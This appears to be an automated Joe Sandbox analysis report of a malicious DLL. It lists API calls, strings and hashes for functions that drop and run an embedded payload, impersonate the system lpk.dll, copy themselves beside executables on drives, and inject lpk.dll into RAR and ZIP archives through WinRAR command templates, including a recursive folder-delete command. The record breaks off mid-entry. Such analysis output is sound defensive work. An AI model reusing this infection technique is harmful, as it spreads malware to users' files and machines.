WaitForSingleObject.KERNEL32(00001388,?,?,100019A9), ref: 10001663

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CountDrivesLogicalObjectSingleTickWait
String ID:
API String ID: 42545375-0
Opcode ID: 2f4c3f1a3b6afdf214a9756a201ba7ea0d71bd53a76343712a0b17754985ecb0
Instruction ID: 3f6e6b7f54fa11ca4b0782ed1666a21edfd725203009cfb413e51542acf73e8d
Opcode Fuzzy Hash: 2f4c3f1a3b6afdf214a9756a201ba7ea0d71bd53a76343712a0b17754985ecb0
Instruction Fuzzy Hash: 56F0F6319083259FF700EF30ECC886FBBEDEB802D5B25492FF500C2158C632AC049A61

Function 10001338 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1000134F
PathFindFileNameW.SHLWAPI(?), ref: 1000135C
PathFindExtensionW.SHLWAPI(00000000), ref: 10001377
lstrcmpiW.KERNEL32(00000000,.TMP), ref: 10001387

Strings

.TMP, xrefs: 10001381

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: FileFindNamePath$ExtensionModulelstrcmpi
String ID: .TMP
API String ID: 597247504-614523329
Opcode ID: b46ec49155dca4e4acb181e031907566a4278cfaff318f8430b02358fa9435f5
Instruction ID: 1fd35f4ed13ad4ccd143400fde8a975121882a3ba8c08806c051296bf98cdfa8
Opcode Fuzzy Hash: b46ec49155dca4e4acb181e031907566a4278cfaff318f8430b02358fa9435f5
Instruction Fuzzy Hash: 43F03760A003159AFB50AF608D4DED737FCEB003C5F028555E559D74AAEBF4CAC9CA60

Function 10001134 Relevance: 7.5, APIs: 5, Instructions: 36
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(00000065,0000000A,00000001,?,10001A61), ref: 10001142
SizeofResource.KERNEL32(00000000,?,?,10001A61), ref: 10001156
LoadResource.KERNEL32(00000000,?,?,10001A61), ref: 10001165
LockResource.KERNEL32(00000000,?,?,10001A61), ref: 10001174
lstrcpynA.KERNEL32(10003220,00000000,00000020,?,?,10001A61), ref: 10001186

Memory Dump Source

Source File: 00000000.00000002.1582939076.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1582878842.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1582987564.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1583149831.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Resource$FindLoadLockSizeoflstrcpyn
String ID:
API String ID: 3315616855-0
Opcode ID: 177b28840c69342d611e61a706d029771a620c0a2154c7c66a29e914538ba66c
Instruction ID: 8471c72c1caef8166e4ab4b94a4b144f79c53e762d3decfbeebc5ecea59f4515
Opcode Fuzzy Hash: 177b28840c69342d611e61a706d029771a620c0a2154c7c66a29e914538ba66c
Instruction Fuzzy Hash: 99F01C35A01334BBFB261BA59CCCF973FADEB497D5F01C126FA05D21A9DA21C815C660

Analysis Process: rundll32.exePID: 7000, Parent PID: 4944COMMON

Execution Graph

Execution Coverage:	32%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	138
Total number of Limit Nodes:	6

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 10001193 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 104
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(00000066,0000000A,?,00000001), ref: 100011AD
SizeofResource.KERNEL32(00000000,?,00000001), ref: 100011C4
LoadResource.KERNEL32(00000000,?,00000001), ref: 100011D4
LockResource.KERNEL32(00000000,?,00000001), ref: 100011EC
GetTempPathW.KERNEL32(00000104,?,?,?,00000001), ref: 1000120A
GetTempFileNameW.KERNELBASE(?,hrl,00000000,?,?,?,00000001), ref: 1000121E
CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,?,?,00000001), ref: 10001239
WriteFile.KERNELBASE(00000000,?,00000001,?,00000000,?,?,00000001), ref: 10001255
CloseHandle.KERNEL32(00000000,?,?,00000001), ref: 10001265
RtlZeroMemory.KERNEL32(?,00000044,?,?,00000001), ref: 10001272
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 1000129E
CloseHandle.KERNEL32(?,?,?,00000001), ref: 100012AE
CloseHandle.KERNEL32(?,?,?,00000001), ref: 100012B3

Strings

D, xrefs: 10001294
hrl, xrefs: 10001218

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$CloseFileHandle$CreateTemp$FindLoadLockMemoryNamePathProcessSizeofWriteZero
String ID: D$hrl
API String ID: 3860286866-1539874146
Opcode ID: 4d7fa836e7c1b89c7a2dc873b2d0427aa4d1f5576468e1d68e679cf7da32b867
Instruction ID: 7e218033b22d9d8325d54e1b04e0e1002b9ec3418c8ade03e82d96821e86f301
Opcode Fuzzy Hash: 4d7fa836e7c1b89c7a2dc873b2d0427aa4d1f5576468e1d68e679cf7da32b867
Instruction Fuzzy Hash: 0A31E8B1D01228ABEB11EFA0CC8CEEE7BBDEB49791F104566F605E2165D7344A54CB60

Function 10001A32 Relevance: 10.6, APIs: 7, Instructions: 55
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000001,10003018,00000104), ref: 10001A4F
DisableThreadLibraryCalls.KERNEL32(00000001), ref: 10001A56

Part of subcall function 10001134: FindResourceW.KERNEL32(00000065,0000000A,00000001,?,10001A61), ref: 10001142
Part of subcall function 10001134: SizeofResource.KERNEL32(00000000,?,?,10001A61), ref: 10001156
Part of subcall function 10001134: LoadResource.KERNEL32(00000000,?,?,10001A61), ref: 10001165
Part of subcall function 10001134: LockResource.KERNEL32(00000000,?,?,10001A61), ref: 10001174
Part of subcall function 10001134: lstrcpynA.KERNEL32(10003220,00000000,00000020,?,?,10001A61), ref: 10001186

Part of subcall function 10001338: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 1000134F
Part of subcall function 10001338: PathFindFileNameW.SHLWAPI(?), ref: 1000135C
Part of subcall function 10001338: PathFindExtensionW.SHLWAPI(00000000), ref: 10001377
Part of subcall function 10001338: lstrcmpiW.KERNEL32(00000000,.TMP), ref: 10001387

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10001A8E

Part of subcall function 100012BD: CreateMutexA.KERNELBASE(00000000,00000000,10003220,?,10001A74), ref: 100012C7

Part of subcall function 10001193: FindResourceW.KERNEL32(00000066,0000000A,?,00000001), ref: 100011AD
Part of subcall function 10001193: SizeofResource.KERNEL32(00000000,?,00000001), ref: 100011C4
Part of subcall function 10001193: LoadResource.KERNEL32(00000000,?,00000001), ref: 100011D4
Part of subcall function 10001193: LockResource.KERNEL32(00000000,?,00000001), ref: 100011EC
Part of subcall function 10001193: GetTempPathW.KERNEL32(00000104,?,?,?,00000001), ref: 1000120A
Part of subcall function 10001193: GetTempFileNameW.KERNELBASE(?,hrl,00000000,?,?,?,00000001), ref: 1000121E
Part of subcall function 10001193: CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,?,?,00000001), ref: 10001239
Part of subcall function 10001193: WriteFile.KERNELBASE(00000000,?,00000001,?,00000000,?,?,00000001), ref: 10001255
Part of subcall function 10001193: CloseHandle.KERNEL32(00000000,?,?,00000001), ref: 10001265
Part of subcall function 10001193: RtlZeroMemory.KERNEL32(?,00000044,?,?,00000001), ref: 10001272
Part of subcall function 10001193: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 1000129E
Part of subcall function 10001193: CloseHandle.KERNEL32(?,?,?,00000001), ref: 100012AE
Part of subcall function 10001193: CloseHandle.KERNEL32(?,?,?,00000001), ref: 100012B3

SetEvent.KERNEL32(?), ref: 10001ABA
WaitForSingleObject.KERNEL32(000000FF), ref: 10001AC8
CloseHandle.KERNEL32 ref: 10001ADA
CloseHandle.KERNEL32 ref: 10001AE2

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$File$CloseHandle$CreateFindName$Path$EventLoadLockModuleSizeofTemp$CallsDisableExtensionLibraryMemoryMutexObjectProcessSingleThreadWaitWriteZerolstrcmpilstrcpyn
String ID:
API String ID: 3535865480-0
Opcode ID: 9463e6314e2ffea4b211b81d2ab195e89bd7a5a57881afda2ee0c205d14b84f9
Instruction ID: ffd36879a7497b368e77efcd0eb173f2275a3137c17b7fd903d544f692c8100a
Opcode Fuzzy Hash: 9463e6314e2ffea4b211b81d2ab195e89bd7a5a57881afda2ee0c205d14b84f9
Instruction Fuzzy Hash: 78115B34606332AAF612EBA18C89BCF3BACEF023E5F118116F554D10ADDB609950CA63

Function 100010CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23
librarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 100010E3
lstrcatW.KERNEL32(?,\lpk), ref: 100010F5
LoadLibraryW.KERNELBASE(?), ref: 10001102

Part of subcall function 1000101F: RtlMoveMemory.KERNEL32(10003250,00000000,LpkEditControl,00000040,LpkDrawTextEx,LpkDllInitialize,LpkTabbedTextOut,10001116), ref: 1000105E

Strings

\lpk, xrefs: 100010E9

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: DirectoryLibraryLoadMemoryMoveSystemlstrcat
String ID: \lpk
API String ID: 3372298440-336436324
Opcode ID: da33033e2e221ff141f50507f8a04e5c7ee6db60748155a8461eceed5cf1bc2c
Instruction ID: be4007e3f20e417fa77d5d5c324e07ec6705456ad939ec99c1b7038da3bba866
Opcode Fuzzy Hash: da33033e2e221ff141f50507f8a04e5c7ee6db60748155a8461eceed5cf1bc2c
Instruction Fuzzy Hash: B2E0127480032A9BFB50EBB08C8EAC777BCE704381F000562E755D206AEF74D585CB50

Function 100012F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00000104), ref: 10001311
PathFindFileNameW.SHLWAPI(?), ref: 1000131E
lstrcmpiW.KERNELBASE(00000000,lpk.dll), ref: 1000132A

Strings

lpk.dll, xrefs: 10001324

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FileName$FindModulePathlstrcmpi
String ID: lpk.dll
API String ID: 1239673384-3066363995
Opcode ID: 6ddba052437873c055f84e44d424d8da0386140e72b76d5d1097730297a1a48a
Instruction ID: 2c49bb99bc8642171fc9961312980d4ab0a4eef97db440158d685f58edb63067
Opcode Fuzzy Hash: 6ddba052437873c055f84e44d424d8da0386140e72b76d5d1097730297a1a48a
Instruction Fuzzy Hash: 35E0127554032D6BEB116B70CC8DDD7376CA700745F004251F65AD20BADA74958DCF50

Function 100019E6 Relevance: 6.0, APIs: 4, Instructions: 25
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,100018D3,00000000,00000004,00000000), ref: 100019F4
SetThreadPriority.KERNELBASE(00000000,000000F1), ref: 10001A02
ResumeThread.KERNELBASE ref: 10001A12
TerminateThread.KERNEL32(00000000), ref: 10001A24

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Thread$CreatePriorityResumeTerminate
String ID:
API String ID: 2154424394-0
Opcode ID: 3913cdfa09b60b7149b9d1de93706da214591cc2ab76757be7511d577559ebbf
Instruction ID: e961737a7aae76fd0c4580525259ff7f5de2b8d71232f79ea42e210bb63285d4
Opcode Fuzzy Hash: 3913cdfa09b60b7149b9d1de93706da214591cc2ab76757be7511d577559ebbf
Instruction Fuzzy Hash: AFE07570502230BAFA119B769C8CB873F6AEB076F1B554316F62E915BAC7204581CBA1

Function 100012BD Relevance: 4.5, APIs: 3, Instructions: 24
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000000,10003220,?,10001A74), ref: 100012C7
GetLastError.KERNEL32(00000001,?,10001A74), ref: 100012D7
CloseHandle.KERNEL32(00000000,?,10001A74), ref: 100012EB

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID:
API String ID: 4294037311-0
Opcode ID: 679afb9bc1ba41874d318fcbe5ee5d611c016a16ab61a98bcb540af40b34feda
Instruction ID: 226164d0f01b805de613a55782abc57cedde5fe5c7c82aa8690d380dee59acf0
Opcode Fuzzy Hash: 679afb9bc1ba41874d318fcbe5ee5d611c016a16ab61a98bcb540af40b34feda
Instruction Fuzzy Hash: 1BD05E3660873067F212937CBC0CB8F2A35EBC5BF2F128265FE4AD229CCB24490685D5

Function 10001000 Relevance: 3.0, APIs: 2, Instructions: 8
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(10001116,10001029), ref: 1000100A
ExitProcess.KERNEL32 ref: 10001016

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressExitProcProcess
String ID:
API String ID: 2796388413-0
Opcode ID: d6c54ef09a1c41390c756e13bcc0c54c78fbecb98ee2d0f10b5980c889cfc44d
Instruction ID: 5188076986118a0aee3e910be33b50d7ca781def4220dbbbf73b176a37f9c490
Opcode Fuzzy Hash: d6c54ef09a1c41390c756e13bcc0c54c78fbecb98ee2d0f10b5980c889cfc44d
Instruction Fuzzy Hash: F6C04C35104261ABFA11AB618E8CB067B66AB547D1B114215E255800BED6318450EA15

Non-executed Functions

Function 10001677 Relevance: 54.4, APIs: 26, Strings: 5, Instructions: 172
stringfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 1000168F
lstrcpyW.KERNEL32(?,A:\,0000EA60,753C73E0), ref: 100016C2
lstrcpyW.KERNEL32(?,?), ref: 100016DF
PathAppendW.SHLWAPI(?,10002374), ref: 100016F3
FindFirstFileW.KERNEL32(?,?), ref: 10001703
PathFindExtensionW.SHLWAPI(?), ref: 100017CA
lstrcmpiW.KERNEL32(00000000,.EXE), ref: 100017E1
lstrcpyW.KERNEL32(?,?), ref: 100017F5
PathAppendW.SHLWAPI(?,lpk.dll), ref: 10001803
GetFileAttributesW.KERNEL32(?), ref: 1000180C
CopyFileW.KERNEL32(10003018,?,00000001), ref: 10001829
SetFileAttributesW.KERNEL32(?,00000007), ref: 10001838
lstrcmpiW.KERNEL32(100015A2,.RAR), ref: 10001846
lstrcmpiW.KERNEL32(100015A2,.ZIP), ref: 10001854
lstrcpyW.KERNEL32(?,?), ref: 1000187D
PathAppendW.SHLWAPI(?,?), ref: 1000188D
WaitForSingleObject.KERNEL32(00000014), ref: 100018A4
FindNextFileW.KERNEL32(100015A2,?), ref: 100018BF

Strings

A:\, xrefs: 100016BC
.RAR, xrefs: 1000183E
lpk.dll, xrefs: 100017F7
.ZIP, xrefs: 1000184C
.EXE, xrefs: 100017DB

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: File$Pathlstrcpy$AppendFindlstrcmpi$AttributesObjectSingleWait$CopyExtensionFirstNext
String ID: .EXE$.RAR$.ZIP$A:\$lpk.dll
API String ID: 3771388200-3932496361
Opcode ID: c6fda171f6056316e2428e6f33dc1771b38d5d81fbede9409986d606e9291121
Instruction ID: 14b84c573bc6bfc0103a48903cae28372ea9a580d345985b263a6e171d24a783
Opcode Fuzzy Hash: c6fda171f6056316e2428e6f33dc1771b38d5d81fbede9409986d606e9291121
Instruction Fuzzy Hash: 5651DDB290022DAAEB10DBA4CC88BDE77BDEB44390F1445A6E605E2055DB75DB84CFA0

Function 1000142B Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 129
stringthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHRegGetValueW.SHLWAPI(80000000,WinRAR\shell\open\command,00000000,00000002,00000000,?,?), ref: 10001456
lstrcpyW.KERNEL32(00000022,?), ref: 10001485
StrStrIW.SHLWAPI(00000022,1000230C), ref: 10001498
PathRemoveFileSpecW.SHLWAPI(00000022), ref: 100014B2
PathAppendW.SHLWAPI(00000022,rar.exe), ref: 100014C4
GetFileAttributesW.KERNEL32(00000022), ref: 100014D1
PathGetShortPath.SHELL32(00000022), ref: 100014E9
GetTempPathW.KERNEL32(00000104,?), ref: 100014FB
GetCurrentThreadId.KERNEL32 ref: 10001508
GetTempFileNameW.KERNEL32(?,IRAR,00000000), ref: 1000151B
wsprintfW.USER32 ref: 10001544

Part of subcall function 10001398: RtlZeroMemory.KERNEL32(?,00000044), ref: 100013A7
Part of subcall function 10001398: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100013D1
Part of subcall function 10001398: GetLastError.KERNEL32 ref: 100013DB

wsprintfW.USER32 ref: 10001580

Part of subcall function 10001398: WaitForSingleObject.KERNEL32(?,?), ref: 100013E9
Part of subcall function 10001398: TerminateProcess.KERNEL32(?,000005B4), ref: 100013FB
Part of subcall function 10001398: GetExitCodeProcess.KERNEL32(?,?), ref: 1000140F
Part of subcall function 10001398: CloseHandle.KERNEL32(?), ref: 1000141E
Part of subcall function 10001398: CloseHandle.KERNEL32(?), ref: 10001423

Part of subcall function 10001677: WaitForSingleObject.KERNEL32(00000000), ref: 1000168F

wsprintfW.USER32 ref: 100015C0
wsprintfW.USER32 ref: 100015E6

Strings

", xrefs: 10001464
cmd /c RD /s /q "%s", xrefs: 100015E0
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll", xrefs: 100015BA
rar.exe, xrefs: 100014B8
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll", xrefs: 1000153E
s<u, xrefs: 10001521
WinRAR\shell\open\command, xrefs: 10001445
IRAR, xrefs: 1000150F
"%s" x "%s" *.exe "%s\", xrefs: 1000157A

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Path$wsprintf$FileProcess$CloseHandleObjectSingleTempWait$AppendAttributesCodeCreateCurrentErrorExitLastMemoryNameRemoveShortSpecTerminateThreadValueZerolstrcpy
String ID: "$"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"$"%s" x "%s" *.exe "%s\"$IRAR$WinRAR\shell\open\command$cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"$cmd /c RD /s /q "%s"$rar.exe$s<u
API String ID: 2025278562-1424356315
Opcode ID: 142c22ba32e87d5e21e1317ff34b13b051766c503af886549bf79c5699618864
Instruction ID: 53c986b37aabe2969284ac0dd55f15aa40eaa0efec7de0ac8071c71bfebae4df
Opcode Fuzzy Hash: 142c22ba32e87d5e21e1317ff34b13b051766c503af886549bf79c5699618864
Instruction Fuzzy Hash: 1041C4B690021DAAEF10DB90CD48EDA77BCEB44340F1045A2B619D6055E674EB85CFB1

Function 1000101F Relevance: 21.0, APIs: 1, Strings: 11, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001000: GetProcAddress.KERNEL32(10001116,10001029), ref: 1000100A
Part of subcall function 10001000: ExitProcess.KERNEL32 ref: 10001016

RtlMoveMemory.KERNEL32(10003250,00000000,LpkEditControl,00000040,LpkDrawTextEx,LpkDllInitialize,LpkTabbedTextOut,10001116), ref: 1000105E

Strings

LpkTabbedTextOut, xrefs: 1000101F
LpkInitialize, xrefs: 1000108C
LpkEditControl, xrefs: 10001049
LpkDrawTextEx, xrefs: 10001038
ftsWordBreak, xrefs: 100010B9
LpkGetTextExtentExPoint, xrefs: 1000107D
LpkUseGDIWidthCache, xrefs: 100010AA
LpkExtTextOut, xrefs: 10001064
LpkGetCharacterPlacement, xrefs: 1000106E
LpkPSMTextOut, xrefs: 1000109B
LpkDllInitialize, xrefs: 10001029

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressExitMemoryMoveProcProcess
String ID: LpkDllInitialize$LpkDrawTextEx$LpkEditControl$LpkExtTextOut$LpkGetCharacterPlacement$LpkGetTextExtentExPoint$LpkInitialize$LpkPSMTextOut$LpkTabbedTextOut$LpkUseGDIWidthCache$ftsWordBreak
API String ID: 598812106-3128392633
Opcode ID: 7b87169acbeb48b0e10738be1b64164151dc3c35c96d6f7d10ce1f3cc01630ac
Instruction ID: aa075801c4fef1efc4910219ef897301fe87f4caca160f87edb01903a9b0afcb
Opcode Fuzzy Hash: 7b87169acbeb48b0e10738be1b64164151dc3c35c96d6f7d10ce1f3cc01630ac
Instruction Fuzzy Hash: 48015474C0239065FB27EFB14D95BCA3B54E7196C1F10C515F3446712EDBB470849B59

Function 100018D3 Relevance: 16.6, APIs: 11, Instructions: 100
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.KERNEL32(?,00000060), ref: 100018E6
DriveType.SHELL32(00000002), ref: 10001902
CreateThread.KERNEL32(00000000,00000000,10001677,00000002,00000004,00000000), ref: 1000191D
SetThreadPriority.KERNEL32(00000000,000000F1), ref: 10001930
ResumeThread.KERNEL32(?), ref: 1000193D
TerminateThread.KERNEL32(?,00000000), ref: 10001956
WaitForMultipleObjects.KERNEL32(00000000,?,00000001,00000000), ref: 10001975
RtlZeroMemory.KERNEL32(?,00000060), ref: 10001989
CloseHandle.KERNEL32(?), ref: 10001997
WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 100019C0
CloseHandle.KERNEL32(?), ref: 100019D0

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491624613.0000000010002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1491660157.0000000010004000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Thread$CloseHandleMemoryMultipleObjectsWaitZero$CreateDrivePriorityResumeTerminateType
String ID:
API String ID: 1898017378-0
Opcode ID: 71ecf636f0081dbd197aaeebedbcf1e6d536c32a25ba8b4cc3754e929457f104
Instruction ID: a0013d5da517d4d5a33f6e42946cb667d24e2e6983c8dbf7389f749baf9380a9
Opcode Fuzzy Hash: 71ecf636f0081dbd197aaeebedbcf1e6d536c32a25ba8b4cc3754e929457f104
Instruction Fuzzy Hash: A631B671540721ABF712EB20CC98BAB7BEEEF807D0F500615F6A6D10A9C772C945C762

Function 10001398 Relevance: 12.1, APIs: 8, Instructions: 54
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.KERNEL32(?,00000044), ref: 100013A7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100013D1
GetLastError.KERNEL32 ref: 100013DB
WaitForSingleObject.KERNEL32(?,?), ref: 100013E9
TerminateProcess.KERNEL32(?,000005B4), ref: 100013FB
GetExitCodeProcess.KERNEL32(?,?), ref: 1000140F
CloseHandle.KERNEL32(?), ref: 1000141E
CloseHandle.KERNEL32(?), ref: 10001423

Memory Dump Source

Source File: 00000003.00000002.1491575185.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1491536404.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
